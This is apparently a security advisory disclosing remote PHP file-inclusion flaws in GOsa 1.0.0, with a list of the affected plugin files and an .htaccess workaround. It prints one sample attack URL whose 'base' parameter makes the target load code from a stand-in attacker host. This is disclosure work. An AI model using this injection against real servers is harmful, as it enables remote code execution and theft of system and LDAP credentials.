I. BACKGROUND The GOnicus System Administrator is a PHP based administration tool for managing accounts/systems in LDAP databases. Project homepage : http://www.gonicus.de II. DESCRIPTION A remote attacker can inject into GOsa arbitrary PHP code that executes under the privileges of the underlying web server. There are serveral places, where by modifying several variables attacker could execute arbitrary PHP code. By setting plugin variable in following files attacker could include remote files and execute them as a PHP code : plugins/3fax/1blocklists/index.php plugins/2administration/6departamentadmin/index.php plugins/2administration/5terminals/index.php plugins/2administration/4mailinglists/index.php plugins/2administration/3departaments/index.php plugins/2administration/2groupd/index.php The same situation exists in include/help.php where we could set base variable as a remote host and include remote file. The following is a sample attack URL that would cause "target.server" to load include/common.inc from "attackers.server". http://target.server/include/help.php?base=http://attackers.server/ GOsa doesnt' support "register_globals off". III. ANALYSIS Remote exploitation allows an attacker to execute arbitrary commands and code under the privileges of the web server. This also opens the door to privilege escalation attacks. Attacker could also debug httpd child processes and grab secret information like users system passwords, LDAP passwords. IV. DETECTION GOsa version 1.0.0 ( current ) is confirmed vulnerable. V. Workaround Temporary solution is to enable apache .htaccess authentication in all subdirectories containing .php files, which are included, not accessed directly. Example .htaccess file AuthType Basic AuthName koza AuthUserFile /dev/null require valid-user Karol Wiesek [appelast-at-bsquad.sm.pl]
